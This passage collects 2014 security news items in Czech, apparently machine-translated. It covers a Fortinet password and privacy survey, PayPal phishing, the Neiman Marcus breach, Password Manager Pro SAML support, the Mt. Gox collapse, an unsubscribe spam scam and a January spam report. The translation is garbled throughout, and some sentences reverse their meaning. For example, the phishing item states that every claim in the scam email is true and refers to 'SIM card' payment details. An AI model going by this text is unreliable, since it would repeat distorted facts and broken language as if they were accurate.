FortiSandbox Aktualizace softwaru 1.2 je nyní k dispozici pro zákazníky FortiSandbox-3000D, a FortiSandbox-1000D se očekává, že loď ve druhém čtvrtletí tohoto roku.


Co si lidé myslí o hesla, e-mailové snooping a osobních údajů
2.3.2014 Kriminalita
Na konferenci RSA v San Franciscu, Fortinet zveřejněn nový výzkum, který ukazuje, kde milénia a Gen-Xers stát v souvislosti s hesly, on-line marketingových praktik, e-mailovou špehovat, a jejich osobních údajů. ze závěrů nezávislého US-založené průzkumu 150 založené Gen X (věk 33-48) a 150 milénia (ve věku 18-32) s 50/50 mužské / ženské rozdělení, průzkum odhalil 41% obou Millenials a Gen-X se nikdy nezmění své on-line heslo, nebo jen změnit po výzvě . Z respondentů, kteří signalizovali, že jsou ostražití o změně svá hesla, 16% (19% milénia, 13% Gen-X) je měnit jednou za měsíc, 30% (25% milénia, 35% Gen-X) nic měnit každé tři jejich měsíců a 9% (11% milénia, 7% Gen-X) změnit alespoň jednou za rok. Když se zeptal, jestli měli heslo pro přístup k jejich telefon, 57% uvedlo, že ano, zatímco 43% uvedlo, že ne. Zdá se, že Gen-X je důvěřivý v tomto ohledu, s 49% říká, že nepoužívají mobilní hesla zařízení, zatímco méně počet Millenials (37%) připustila, že nebude mít heslo na svém zařízení. Z těch, kteří se přiznal pomocí hesla na svém mobilním zařízení, nejvíce populární druh zdaleka byl jednoduchý 4-místný kód PIN (číselný heslo), přičemž na první místo na 47%. Komplexní hesla, jako jsou alfanumerické, písmen a čísel, přišel v vteřině s 26%. To bylo těsně následován vzorem (tj. trojúhelník, čtverec) na 21%. A na posledním místě byl biometrický (tj., rozpoznávání obličeje, otisků prstů) při 5%. S ohledem na to, jak respondenti zacházet hesla pro internetové účty, které používají, zdá se, mnoho z nich se zpráva, že je důležité mít různá hesla pro každý web, který vyžaduje jeden, ale je tu stále prostor pro zlepšení. 40% všech respondentů uvedlo, že mají jiné heslo pro každý účet on-line, které používají, 46% přiznat, že různá hesla pro alespoň několik stránek, které navštívíte. 7% používat různá hesla pro jejich nejcitlivější účtů a dalších 7% se používá stejné heslo pro všechny účty. hodnota osobních údajů Chcete-li určit hodnotu osobních údajů, nás požádal skupinu zařadit do pořadí podle důležitosti následující datové typy že by bylo velmi bojí, že přijdou, lékařské informace, poštovní adresa, e-mailová adresa, finanční výkazy, vzdělávací informace, číslo sociálního zabezpečení, daňová přiznání, osobní soubory, pracovní soubory, online hesla, obsah e-mailů, historie prohlížení internetu, on-line nákupu Historie a IP adresa. Jak milénia a Gen-X skupiny uvedlo, že jejich číslo sociálního zabezpečení bylo nejdůležitější údaje, které se bojí ztráty. Obě skupiny se také shodli, že on-line hesla umístila na třetím místě, pokud jde o údaje důležité. Ale to je místo, kde podobnost končí. Millennials zařadil daňové přiznání jako druhý, on-line nákup historie jako čtvrtý a obsah e-mailů jako pátý. Gen-Xers, na druhé straně, uvedlo, že jejich poštovní adresa byla druhá nejdůležitější z údajů, které bych nerad, aby ukradli. Historie procházení Internetu přišel čtvrtý a pracovních souborů přišel v páté. "Je zajímavé si povšimnout, že zatímco pracovní e-maily přišel v páté pro Gen-Xers, nepodařilo se řadí v první pětce pro Millenials," řekl John Maddison, viceprezident marketing pro Fortinet. "To je trošku o, a to zejména při porovnávání tisícileté postoje k BYOD v průzkumu, který jsme spustili v říjnu loňského roku, že našel 51% z Millenials by v rozporu s firemní politiky omezení používání vlastních zařízení, cloud storage a nositelná technologie pro práci. Celkově vzato , Millennials jsou v podstatě říká: "Nezajímá nás, co naši zaměstnavatelé říkají. Budeme používat jakémkoli zařízení, chceme, aby v práci, a pokud podniky údaje ztratí nebo zmizí, je špatné. " Email snooping Když se ptali na nedávné odhalení NSA 44% respondentů odpovědělo, že vládní agentura překročil své hranice (41% milénia a 47% z Gen-X), 20% nemá vyhraněný názor o jejich činnosti (22% z Millenials a 18% z Gen-X), 19% cítí, že vláda dělá to, co je nezbytné k ochraně našeho národa a jednají v nejlepším zájmu lidí (23% z Millenials a 15% z Gen-X), a 17% uznal, že nevědí nic o tom, co se děje s NSA (14% Millenials a 21% Gen-X). Uplatňování NSA snooping zjevení pro zaměstnavatele, jsme se zeptali na skupinu, jak by se cítili, kdyby jejich zaměstnavatel prohlédl jejich online aktivity a komunikaci. Pouze 12% uvedlo, že dělali jen to, co bylo nutné (16% Millenials a 9% Gen-X). 38% (37% milénia, 39% Gen-X) uvedlo, že byli v pohodě se sledováním, pouze pokud byly kontroly činnosti při práci pro práci. 39% z obou demografických skupin, řekl jakýkoli typ sledování firemního je mimo meze. 3% z obou skupin nemají názor a 8% (5% milénia, 11% Gen-X) nejsou jisti, jak se cítí o firemní snooping. Když se ptáme na skupinu, která z těchto on-line činností, které předpokládá, že budou soukromé; osobní e-mail, pracovní e-mail, sociální média příspěvků, textové zprávy, webové historie, umístění info, telefon audio, on-line nákup historie a něco se vztahovalo k internetu věcí (IoT), 50 +% z obou Millenials a Gen-Xers věřil, že všechny z těchto činností, s výjimkou sociálních médií příspěvků by měla být soukromá. 59 +% z obou skupin se shodli, že sociální média příspěvků by neměla mít stejný očekávání soukromí. On-line marketingové praktiky Zeptali jsme se na skupinu, která z těchto osobních kusů osobních údajů, které by byl ochoten podělit se s obchodníky (osobní e-mail, osobní telefonní číslo, poštovní adresa, přístup k sociální média účtů nebo žádný z výše uvedených. Osobní e-mailová adresa vyšel na vrcholu v 50% (53% milénia 46% Gen-X). Toto bylo následované žádný z výše na 38% ( 35%, 41% Millennials Gen-X). Osobní poštovní adresu přišel na druhé místo v 33% (31% Millennials, 35% Gen-X), která byla těsně následován osobní telefonní číslo na 26% (28%, 25 Millennials % Gen-X). A přichází na dně hromady byla sdílení přístupu k sociálním médií účtů na 9% (9% milénia, 8% Gen-X). Jak podniky se obrátit na sociální média, aby spotřebitelům, jsme se zeptali skupina o jejich nastavení sociálních médií ochrany osobních údajů. Ukazuje se, že 38% (41% milénia, 35% Gen-X) respondentů uvedlo, že používají velmi přísné nastavení ochrany osobních údajů v jejich sociálních aplikacích médií. 41% (40% milénia, 43% Gen-X) pomocí nastavení soukromí omezit pouze určité informace, 16% (15% tisícileté, 17% Gen-X) použít výchozí nastavení aplikace o ochraně osobních údajů a 5% (4% milénia, 5 % Gen-X), nepoužívejte žádné nastavení soukromí vůbec. Když se zeptal, jestli některý z respondentů vůbec starosti některé z osobních identifikačních údajů, jako je například dovolenou plány, pracovat info, atd., by mohly být sdíleny nebo použít proti nim, 28% (27% milénia, 28% Gen-X) řekl, že se obává, 18% (25% milénia, 11% Gen-X), jsou jen starosti, pokud byla informace sdílena s obchodníky, 19% (21% milénia, 17% Gen-X), řekl, že to není strach vůbec, 30% (23% milénia, 37% Gen-X) uvedlo, že nemají své osobní údaje, zatímco 5% (3% milénia, 7% Gen -X), nevím, jak se cítí o to.


Dejte si pozor na falešné PayPal "Survey Program" nabídek
2.3.2014 Bezpečnost
Uživatelé PayPal založené ve Velké Británii jsou zaměřeny s falešnou PayPal e-mailu nabízí odměnu za účast v "novém programu zjišťování," varuje Malwarebytes. "Průzkum bude trvat 5 minut a za vaše úsilí a pochopení PayPal vybere většina zákazníků že se tento průzkum a odměnou jim s 25,00 libry GBP. Bylo by užitečné, kdyby si to vyplnit hned teď. Není-li to možné, udělejte to brzy, "říká e-mailu. "Chcete-li spustit dokončení průzkumu stáhněte si attachement formulář a postupujte podle pokynů k otevření zabezpečené okno prohlížeče PayPal bonusový kód je PP2553455;.. Prosím, zkopírujte / vložte kód a napsat kód v souboru zjišťování, aby si váš 25,00 liber GBP cenu " připojené online_form.zip souboru obsahuje HTM stránky s on-line formuláře, které mají být vyplněna Existuje několik otázek k zodpovězení týkající se kvality služby PayPal, a pak oběti jsou vyzýváni, aby se podělili o své jméno, adresu, datum narození, a úplného zaplacení. informace na kartě SIM. "Z bezpečnostních důvodů doporučujeme, abyste zavřete prohlížeč po dokončení úvěrového procesu," říká pod formulářem. "Váš účet bude připsán během následujících 3 pracovních dnů." Bohužel pro ty, kteří spadají pro tento trik, každé tvrzení v tomto e-mailu je pravda, a oni budou pravděpodobně hit s poplatky za neoprávněné karty a / nebo pokusů o krádeže identity. PayPal je jeden z nejvíce využívaných značek podle phisherů, protože jeho výplata zpracování povahy. Uživatelům se doporučuje být velmi opatrní, když přezkoumává e-mail zřejmě poslal službou.


Podrobnosti o Neiman Marcus porušení odhalily
2.3.2014 Kriminalita
Porušení Neiman Marcus není tak zlé, jak se dříve věřilo, protože počet potenciálně zasažených karet se snížil z 1,1 milionu na přibližně 350.000. "počet se snížil, protože šetřením bylo zjištěno, že malware nebyl v provozu ve všech našich prodejnách, ani Každý den je v provozu v těch postižených obchodech, během červenec 16-30.října období, " sdílené Neiman Marcus generální ředitel Karen Katz. Forenzní šetření bylo zjištěno, že malware byl v provozu na 77 z 85 prodejen obchodníka, ale ne každý během výše uvedeného období se zaregistrujte nebo každý den. "Ze 350 tisíc platebních karet, které mohou být ovlivněny malware v našem systému , Visa, MasterCard a Discover oznámily nám k dnešnímu dni, že přibližně 9200 z nich byly následně použity podvodně jinde, "dodala, a také nezapomeňte zdůraznit, že čísla sociálního zabezpečení, data narození a čísla PIN nebyla ohrožena, a to on-line zákazníky nebyly ovlivněny, o které se porušení. Do té doby, BusinessWeek reportéři mají přezkoumat zprávu o porušení sestaveného poradenská firma Protiviti na 157-stránkový, a ukázal, že:

Útočníci jsou pravděpodobně ti, kteří porušili cíl, protože psal specifický kód ohrozit síť Neiman Marcus
Dali malware název podobný platební software společnosti tak, že když bude přezkoumáno přihlásí na ochranu koncových bodů, záznamy vázané k němu nebude vystupovat
Malware spustil bezpečnostní systémy společnosti na téměř 60.000 příležitostech, ale to nebyla označena jako takový a odstranit, a systém se automaticky blokovat podezřelé aktivity, jako je zejména funkce byla vypnuta, aby nedošlo k bránit údržbu systému
Konstrukce POS systém umožnil útočníkům se na prodejce, aby znovu načíst malware na počtu registrů rychle poté, co bylo zrušeno na konci každého dne
Útočníci ohrožena POS systém formou internetového směřujících citlivými server připojený k němu
Společnost byla v souladu s normami pro ochranu údajů transakcí.


Password Manager Pro každého SAML podpory 2.0
2.3.2014 Bezpečnost
ManageEngine byla přidána podpora SAML 2.0 Password Manager Pro. Tento krok posiluje mechanismus autentizace uživatele v Password Manager Pro, který umožňuje integraci s federované řešení správy identit pro single sign-on.

Podniky - velké i malé - jsou nyní přijímá federované Single Sign-On řešení, jako je Okta nabídnout bezproblémové ověřování pro uživatele a odvodit přínosy, včetně automatického poskytování a de-provisioning účtů a umožňuje uživatelům mít pohodlí pomocí stejná pověření pro on-premise a cloud aplikací. K dosažení tohoto cíle, nejnovější verze Password Manager Pro (sestavení 7002, beta), podporuje integraci s SAML, otevřený standard datového formátu XML-based pro výměnu autentizačních a autorizačních dat mezi stranami, zejména mezi poskytovatelem identity a poskytovatelem služeb . Technicky Password Manager Pro se chová jako poskytovatele SAML služeb, a to integruje s poskytovateli SAML identity. Out-of-the-box integrace je nyní k dispozici s Okta. Integrace pomáhá pákovému efektu (Okta) ověřování poskytovatele identity pro přístup Password Manager Pro. Uživatelé, kteří nasazují Okta, nebo jiný poskytovatel SAML identity mohou automaticky přihlásit do Password Manager Pro aplikace z uživatelského rozhraní příslušného identitu poskytovatele bez napájení pověření. Kromě toho na podporu pro SAML integrace, nejnovější vylepšení Password Manager Pro jsou bezpečné, SSH / Telnet přístup ke vzdáleným zařízením v datových centrech prostřednictvím poskytování, abyste nastavili skok serverů a MSP vydání, průmyslem první řešení vyvinuté speciálně pro řešení jedinečné privilegované výzvy pro správu identit, kterým čelí (MSPs). Password Manager Pro slouží jako centralizovaném vaultu pro všechny podnikové hesla a pomáhá kontrolovat přístup k IT zdrojů na základě pracovních rolí a odpovědností. Bezpečné, spolehlivé a velmi silné autentizační mechanismus je nezbytný pro produkt tohoto druhu, která je držitelem vysoce citlivých podnikových dat. Password Manager Pro již podporuje řadu on-premise autentizačních systémů, včetně možnosti pákového účinku mechanismus autentizace vnější identity obchody, jako je Active Directory, LDAP, RADIUS a dobrou řadu druhý faktor volby.


Budoucnost Bitcoin po Mt. GOX Incident
1.3.2014 Kriminalita

Není pochyb o tom, že to byl šílený týden pro každého, kdo alespoň vzdáleně zajímá o Bitcoin. Mt. GOX, kdysi největší Bitcoin trhu tam, je vypnout , a tím i hořký konec na situaci téměř měsíc trvající, ve kterém byly všechny výběry zastavil z důvodu " technických problémů ".

Mt. GOX BTC vývoj cen v únoru 2014 zdroj: Clark Moody

Jako zákazníci byli schopni přesouvat své prostředky z Mt. GOX, světově nejznámější výměnu v podstatě se stal izolovaný od zbytku Bitcoin ekosystému, což cenu Bitcoin obchodovaných na Mt. GOX klesnout na tak nízké, jak $ 100 za 1 BTC, než výměna šla zcela v režimu offline.

V naší predikci na 2014, my jsme říkal, že útoky na Bitcoin , konkrétně útoky na Bitcoin bazény, výměny a uživatelé Bitcoin se stane jedním z nejvíce vysoce postavených témat roku . Tyto útoky budou obzvláště populární s podvodníky, protože jejich poměr nákladů a výnosů je velmi příznivá .

Zatímco Mt. GOX událost může být nejvýraznější v Bitcoin historii to-data, protože se říká, že stojí za 744.408 Bitcoins, nebo více než 300 milionů dolarů na současných cenách výhodných podmínek, jediná otázka, která zůstává nezodpovězena, je, co vlastně způsobilo.

TX tvárnost, krátký pro transakce tvárnosti, je známý problém v protokolu Bitcoin. Za určitých okolností to může umožnit útočníkovi vydávat různé podpisy (nebo TX ID) pro stejné transakce, v podstatě dělat to jeví jako transakce nestalo. To může umožnit škodlivý zákazník výměny požadovat více výběry Bitcoin stejných mincí tvrzením transakce nikdy prošli.

Tento typ TX tvárnost útoku byl oficiální důvod uvádějí Mt. GOX, když se rozhodli zastavit výběry, takže se zdá, jako by se staly oběťmi kybernetické loupež, ale možnost tento incident je zevnitř nelze vyloučit.

Transakce tvárnost útok nemusí nutně zahrnovat zasvěcených, když někdo s přímým přístupem do transakčního systému může dělat to mnohem snadněji. Je samozřejmě možné, že útok bylo provedeno výhradně z vnějšku, i když v tomto případě Mt. GOX by měli mít úplné informace o osobě odpovědné za útok, prostě proto, že bych se znovu žádá o finanční prostředky znovu a znovu, citovat síťové chyby a skutečnost, že odstoupení od smlouvy nebyla přijata.

Jediné, co zbývá udělat, je právě teď čekat na orgány činné v trestním řízení až do konce jejich vyšetřování incidentu a doufám, že Mt. GOX a další zúčastněné strany spolupracují s LEA identifikovat ty odpovědné, a pokusit se obnovit škody.

Pokud jde o to, co to znamená pro budoucnost Bitcoin - tento týden nám opět ukázal, a více než kdy jindy, že Bitcoin ekosystém skutečně potřebuje firem, které chápou bezpečnost. Být decentralizované měny, žádný orgán uložit normy a bezpečnostní předpisy, takže je to na nás, Bitcoin nadšence a celé crypto-měny Společenství, s cílem zvýšit laťku: výběrem pracovat pouze s Bitcoin společnostmi, které mají neposkvrněné traťový rekord, dobrou znalost technologie zapojené a zejména požadované jistoty, ale co je nejdůležitější ochota vždy udržet inovace, aby vždy jít extra mile získat důvěru zákazníků. Udělejme to stalo a Bitcoin bude v pohodě!


Jste si jisti, že chcete odhlásit z našich pošty?
1.3.2014 Spam

Spammeři jsou neúnavní ve svých pokusech obejít anti-spamové filtry a matou příjemce spamu. Nedávno jsme zjistil hromadnou korespondenci se tváří jako automatickou odpověď na žádost odhlásit z novinek blogu. Autoři poznamenat jejich lítost nad ztrátou jednoho z jejich účastníků a zeptal se, jestli uživatel opravdu chce odhlásit.

Fráze jako "Litujeme, že jste se rozhodli pro odhlášení", se skutečně vyskytují v odpovědích odesílaných následující požadavky odhlásit. Nicméně, tam následoval nějaký neobvyklý text, ve kterém odesílatel také s lítostí informovat příjemce, že oni také odhlášen ho z jiných informačních zásilek na témata, jako jsou:

Řidičské průkazy bez osvědčení zdravotní způsobilosti
Konkurzní řízení pro právnické osoby
Bankovní licence
Zakládání podniků v zahraničí
Nemovitost s 50% slevou
Toto jsou typické spam témata, která, v tomto případě, jak bylo maskované informačních bloků. Proč jsou zprávy tak podezřívavý? Vzhledem k tomu, že odesílatel ani zmiňovat název blogu, webu nebo časopisu, ze kterého se uživatel měl mít odhlášení.

Název odhlášení služby nebylo v názvu domény odesílatele buď - adresa obsahuje pouze jednu větu, která se překládá jako "řidičský průkaz právě teď" (spammeři často používají slova související s tématem zprávy v nových oblastech), a zprávy byly zaslány v měsíci doména byla vytvořena. Nebyly zjištěny žádné odkazy na prodlužují předplatné. Vypadá to, že spammeři mysleli, že všechny zúčastněné uživatelé by odpovědět na zprávu a přijmout celou řadu nevyžádané pošty související se zvoleným tématem.

Ještě drzý poštovní uvedl, že pro určité množství peněz, spammeři by se říct, příjemce, jak zjistila jeho / její e-mailovou adresu a důvod, proč e-mailové schránky je plný spamových zpráv. Informace stojí jen 3,50 dolarů. Aby mohl zaplatit za informace, uživatel musel kliknout na odkaz na konci zprávy.

Odkaz vede na místě zvaném Konec Spam, kde uživatel může prohlédnout kompletní ceník. Například, uživatel by mohl odstranit jeho / její e-mailovou adresu spam e-mailové konference pro 1,50 dolarů platby přes PayPal. Informace o tom, jak spammeři dozvěděli o e-mailovou adresu uživatele, stojí 3,50 dolarů. Podvodníci připomněl uživateli uvést svou e-mailovou adresu, takže oni "vědí jaký e-mailovou adresu, na odhlášení".

Všechny odkazy vedly na stránku PayPal se set platební dokumentu. Pokud uživatel již registrován v systému PayPal, on / ona prostě musela stiskněte tlačítko "Kup teď" a přenést jeho / její peníze na bůh ví kde.

Samozřejmě, že to je nepravděpodobné, že by zastavit spam maily - to je těžké uvěřit, že odesílatel znát všechny spammery na světě a může zastavit jejich poštovní zásilky na žádost uživatele. Kromě toho, po převodu peněz, proud nevyžádané korespondence může dokonce zvýšit po adresa je potvrzen jako platný a naivita uživatele je známý. V nejhorším případě by mohly být použity osobní údaje uživatele před platbou na převod peněz.


Zpráva Spam: leden 2014
1.3.2014 Analýza | Spam

Spam v centru pozornosti
V lednu byla spammeři měnit jejich pozornost od Vánoc a Nového roku se na den svatého Valentýna. Angličtina-a ruskojazyčných hromadné e-maily, které nabízejí kamerové systémy byly ještě další populární trend v lednu.

Takzvané nigerijské podvodníci i nadále využívat smrt Nelsona Mandely a Ariela Šarona, aby přimět uživatele k rozdávání své peníze.

Dovolená spam

S hlavními zimní dovolená přes spammery zapnutý svou pozornost na nadcházející události, a zejména na Valentýna. Stejně jako tradiční "květinové" korespondence a návrhy na romantickou večeři nebo výlet, anglický-jazyk spam obsažen inzeráty, které nabízejí některé poněkud neobvyklé dárky, včetně skutečné hvězdy na obloze.

V únoru, očekáváme růst nejen ve sváteční motivy spam, ale také v hromadné korespondenci na dalších témat. Kromě toho očekáváme nárůst počtu zásilek využívajících téma den svatého Patrika.

V "nigerijské" manželky Nelson Mandela

Tragické události posledních měsíců jsou aktivně využívány "nigerijské" podvodníky ve svých podvodných e-mailů. Na začátku ledna, bývalý izraelský premiér Ariel Šaron zemřel ao týden později jsme zaznamenali hromadnou korespondenci využívání zprávy. Nicméně, smrt Nelsona Mandely byl využíván v mnohem větší míře. První zásilky, kde je smrt bývalého jihoafrického prezidenta se objevila v prosinci.

V lednu, jak se očekávalo, nové e-maily se objevily. Je dobře známým faktem, že Nelson Mandela byl ženatý třikrát, a to bylo něco, co spammeři vyzvednout na. Tentokrát se aktivně používají jména svých manželek přesvědčit příjemce, že jejich příběhy jsou pravdivé.

Jeden "nigerijské" dopis údajně napsal právník po zesnulém prezidentovi druhá manželka Winnie Madikizela neobsahovaly žádné podrobnosti spolupráce. Je pouze uvedeno, že Winnie a její právník potřebuje pomoc při získávání obrovské množství peněz a zlatých prutů a investovat jej. Oni tvrdili, že hledali slušný člověk, který musel být cizí státní příslušník. Pro zpětnou vazbu a více informací e-mail zadali číslo mobilního telefonu. Pozoruhodné je, že podvodníci požádal příjemce kontaktovat a to i v případě, že nabídka nebyla zájmu k němu s tím, že v takovém případě by se hledat pomoc od někoho jiného. Podvodníci samozřejmě počítal chamtivost příjemce je větší, než je jejich zdravý rozum.

Ještě další hromadné korespondence byl údajně od Mandely třetí manželka Graca maršála. Tentokrát se podvodníci pokusili vyhrát sympatie příjemce se smutným příběhem o boji uvnitř Nelsona Mandely rodiny pro jeho miliony a o dalších chamtivých příbuzných, schopných čehokoliv. Pro potvrzení příběh e-maily obsahovaly odkaz na článek zpravodajství v renomovaných novinách. Podvodníci byli požádáni o pomoc při přenášení peníze z "nešťastného manželka prezidenta" a udržet ji v bezpečí na účet příjemce.

Video monitorovací systémy

V lednu byla nárůst ve výši hromadnou korespondenci s nabídkami na nákup a instalaci kamerové systémy na soukromých a komerčních prostor. Takové nabídky jsou poměrně typická. V podstatě, oni jsou nevyžádané e-maily psané na zastoupení různých firem specializujících se na video monitorovacích systémech. Je pravidlem, že tyto e-maily nezadáte název společnosti na adresu odesílatele. Místo, adresa obsahuje jméno nebo příjmení odesílatele, které není vždy stejný název správce ve zprávě.

Anglická jazyková spam na toto téma se zaměřením na osobní bezpečnost a možnost dohlédněte na manžely a manželky, stejně jako zdraví návštěvníků a dělníků v soukromých domech. Zprávy často obsahovaly odkaz na stránkách dodavatele nebo on-line prodejna Kamery místo a kontaktní telefonní číslo.

Zeměpisné rozložení zdrojů spamu
Podíl nevyžádané pošty v e-mailovém provozu


Podíl nevyžádané pošty v e-mailovém provozu

První týden roku 2014 došlo k mírnému poklesu podílu spamu způsobené poklesem spammer aktivity během prázdnin. Nicméně, druhý týden v lednu vynahradil toto: počet spamových zásilek výrazně zvýšil. V druhé polovině měsíce se situace normalizovala a průměr leden představovaly 65,7% všech e-mailového provozu.

Zdroje Spam

V lednu, seznam zdrojů distribuci spamu na celém světě prošla několika změnami.


Zdroje spamu podle země

USA posunul z druhého do prvního místa v kvalifikaci po rozdělení 21,9% veškeré nevyžádané pošty, což představuje nárůst o 3 procentní body. Naproti tomu podíl Číny (16%) se snížil o 7 procentních bodů, což vedlo v zemi klesl na druhé místo. Jižní Korea přišla opět třetí (12,5%), i když jejich podíl rovněž poklesl o 1,5 procentního bodu.

Stejně jako v prosinci, čtvrté místo byla pořízena Tchaj-wan (6,2%), následuje Rusko s 6%. Top 10 byla zaokrouhlena Rumunskem, což představovalo 2% veškeré nevyžádané pošty odeslané na celém světě.

Mírný nárůst spammer činnosti byl zaznamenán v Itálii, kde podíl nevyžádané pošty byl 1,5%, stejně jako ve Španělsku (1%), Hong Kong (1%) a Filipíny (1,1%). Údaje o ostatních zemích zůstal stejný bez změny jejich pořadí.


Zdroje spamu v Evropě podle země

V lednu, Jižní Korea zůstala hlavním zdrojem spamu poslal do evropských uživatelů (47,2%), i když jeho podíl klesl o 5,9 procentního bodu oproti předchozímu měsíci. Příští přišel Tchaj-wan (5,8%), což byl třetí v prosinci, následované USA (-2,1 procentního bodu), v průměru o 5,3%.

Hong Kong skončil měsíc na čtvrtém místě s 3% spamu v Evropě pochází odtud. Rusko (3%) zůstal pátý, získává 0,3 procentních bodů. To je následované Španělskem (2,4%) a Itálii (2%): obě země také vykázal mírný nárůst podílu spamu poslal evropským uživatelům. Rumunsko (1,7%) dokončilo Top 10.

Čína (1,4%) klesl sedm míst a ven z lednového Top 10 jako jeho podíl klesl téměř o 2 procentní body.

Za povšimnutí stojí mírný růst spammer činnost ve Velké Británii (1,4%), v Německu (1,3%) a Francie (0,9%).


Zdroje spamu podle krajů

Asie (49%) zůstal vedoucí regionální zdroj nevyžádané pošty v lednu i přes značný pokles (-7,6 procentního bodu), v spammer činnosti. Severní Amerika přišla druhá, co rozděleny 15% světového spamu, což představuje nárůst o 2,8 procentního bodu. Mezitím, podíl východní Evropě vzrostly o 1,3 procentního bodu, v průměru o 18%, čímž se kraj na třetím místě v hodnocení. Západní Evropa (5,8%) a Latinská Amerika (4%) přišel čtvrtý a pátý, resp.

Škodlivé příloh v e-mailovém provozu
V lednu se Top 10 škodlivých programů, které se šíří prostřednictvím e-mailu byl následující:


TOP 10 škodlivých programů distribuovaných prostřednictvím e-mailu

Trojan-Spy.html.Fraud.gen zůstává nejrozšířenější škodlivý program. Fraud.gen patří do rodiny trojských koní, které používají spoofing technologie: Tyto trojské koně napodobit HTML stránky a jsou distribuovány prostřednictvím e-mailu, se objeví v podobě oznámení od velkých komerčních bank, e-obchody, vývojáři softwaru, atd.

Trojan-PSW.Win32.Fareit.amzb, Trojan-PSW.Win32.Fareit.anaq, Trojan-PSW.Win32.Fareit.annp, Trojan-PSW.Win32.Fareit.anai a Trojan-PSW.Win32.Fareit.amzs přišel druhý, třetí, čtvrtý, osmý a devátý, resp. Tyto programy patří do rodiny malware, který krade uživatelská jména a hesla a posílá je do příkazového serveru zločinců. Mohou také zahájit DDoS útoky, stáhněte a spusťte náhodné software. Všech pět vzorků stáhnout a spustit trojské koně z rodiny Zbot určený k útoku servery a počítače, jakož i pro zachycení uživatelských dat. Ačkoli Trojan je schopen různých škodlivých aktivit, to je nejvíce často používán ukrást bankovní údaje. To může také nainstalovat CryptoLocker , je škodlivý program, který vyžaduje peníze na dešifrování dat uživatele. Trojan-PSW.Win32.Fareit.anai také načte Trojan, který nainstaluje škodlivý rozšíření pro prohlížeče, který je schopen se dívat skrz žádostí o vyhledávání uživatele na hlavních vyhledávačů a výměna výsledků v zájmu zločinců. Mezi škodlivé programy z rodiny Fareit krást peněženky Bitcoin a asi 30 dalších virtuálních měn.

Páté místo obsadil čistou červa Asprox určené k šíření spamu. To automaticky infikuje weby, načte a spustí další programy, a sbírá cenné informace uložené v počítači, jako jsou hesla a další údaje pro přístup k e-mailu a FTP účtů.

Top 10 byla završena Email-Worm.Win32.Bagle.gt., E-mailový červ, který posílá kopie sebe sama všem e-mailové adresy nalezené v infikovaném počítači. Červ také stahuje soubory z internetu bez vědomí uživatele. E-mailové Worm.Win32.Bagle.gt používá svůj vlastní SMTP knihovnu poslat infikované zprávy.


Distribuce mailové antivirových odhalení podle zemí

USA (3,5 procentních bodů), na špičce hodnocení zemí s nejvyšším počtem e-mailových antiviru tlačí na Spojené království až do druhé (-3,41 procentního bodu). Německo zůstalo třetí místo s poklesem o 0,39 procentního bodu ve srovnání s předchozím měsícem.

Ruský podíl na celkovém počtu mailová antivirových odhalení celého světa byla až 2%. Akcie Mexika a Jihoafrické republiky vzrostl výrazně znamená tyto země vstoupily do Top 20 v sedmnáctém a osmnáctém míst, resp.

Zvláštnosti škodlivého spamu

Minulý měsíc se podvodníci zaměřili na uživatele cross-platformní Messenger WhatsApp, jehož obliba po celém světě rychle roste. Messenger umožňuje uživatelům posílat textové zprávy a vyměňovat obrázky a videa a zvukové soubory. Skutečnost, že WhatsApp je v současné době k dispozici pouze pro smartphony a vytvoření účtu WhatsApp nevyžaduje e-mailový účet, nezabránila zločince z rozesílání spamu upozornění e-mailem.

V lednu jsme narazili na falešné oznámení z WhatsApp, který řekl, že jeden z uživatelových přátel nebo jen "váš přítel" poslal mu fotografii nebo obrázek. Přiložený archiv vlastně obsahoval škodlivý program detekován Kaspersky Lab jako Backdoor.Win32.Androm.bjkd., Notoricky známý backdoor, jehož hlavní funkcí je ke stažení další malware v počítači oběti.

Phishing
Pořadí organizací napadeny phisherů se v lednu výrazně nezmění.


Distribuce Top 100 organizací, na něž phisherů podle kategorií

Hodnocení je založeno na společnosti Kaspersky Lab anti-phishing součástí odhalení, které jsou aktivovány pokaždé, když se uživatel pokusí klikněte na odkaz phishing, bez ohledu na to, zda je odkaz v nevyžádaných e-mailů, nebo na webové stránce.

První místo byla opět obsazena sociálních sítí (27,3%), které se zvýšily svůj podíl o 0,9 procentního bodu. Podíl e-mailových služeb (19,7%) a vyhledávačů (16,9%) mírně zvýšil a tyto kategorie zůstaly v druhém a třetím místě v žebříčku, resp.

Finanční a e-pay organizace (15,7%) zůstal na čtvrtém místě, i přes podíl kategorii je pokles o 0,2 procentního bodu ve srovnání s předchozím měsícem.

Procento telefonie a poskytovatelů internetových služeb (8.29%) a IT dodavatelů (5,93%), kategorie mírně snížil, i když to neovlivnilo jejich pořadí - oni zůstali v páté a šesté pozice, resp.

V lednu byla phishery vyslat falešné oznámení z řady populárních on-line obchodů. Příjemci podvodného e-mailu podepsaného "manažer" amerického maloobchodního řetězce Walmart byli informováni, že jejich objednávka nebyla doručena. Chcete-li vyřešit tento problém, byli požádáni, aby vyplnit formulář a odeslat ji zpět do týdne. Zpráva byla navržena v oficiální firemní styl, včetně loga společnosti a automatický podpis na úpatí zprávy - to vše mělo přesvědčit uživatele, že e-mail byl legitimní. Příjemce je však mělo být podezřelé tím, že e-mail se jimi zabývat osobně jménem a skutečnost, že se více než jeden důvod pro dodání není provedena.

V lednu jsme také narazili na německého jazyka phishing hromadnou korespondenci, která byla pomocí názvu Amazon store. Příjemce byl informován, že služba byla zaregistrována pokus o přístup ke svému účtu z počítače někoho jiného. Příjemce byl požádán, aby potvrdil informace o účtu do 48 hodin, jinak by to být blokován. E-mail obsahoval odkaz na stránku phishing. Stojí za to poznamenat, že e-mail neměl sebemenší podobnost legitimní zprávy. Zdá se, že podvodníci doufali, že příjemci byli nezkušení nebo nepozorný, při použití legitimní hledá e-mailovou adresu v poli Od.

Závěr
Podíl nevyžádané pošty v celosvětovém e-mailovém provozu se snížil o 7,6 procentního bodu a v průměru 65,7% v lednu. Jak se předpokládá, že pokles v podílu nevyžádané pošty byl kvůli klidu brzy v lednu, kdy je zde méně podnikatelské činnosti a velký počet botnetů jsou vypnuty.

Spam zásilky obsahovaly reklamy pro dary, jakož i služby, které nabízejí k pořádání různých akcí nebo výletů. Ještě jeden svátek, den svatého Valentýna, byl využíván jak v anglické a ruské jazykové spamu. Zaznamenali jsme tradiční hromadnou korespondenci z "květinových" partnerských programů reklamní romantické večeře a mnoho dalších dárkových nabídkách.

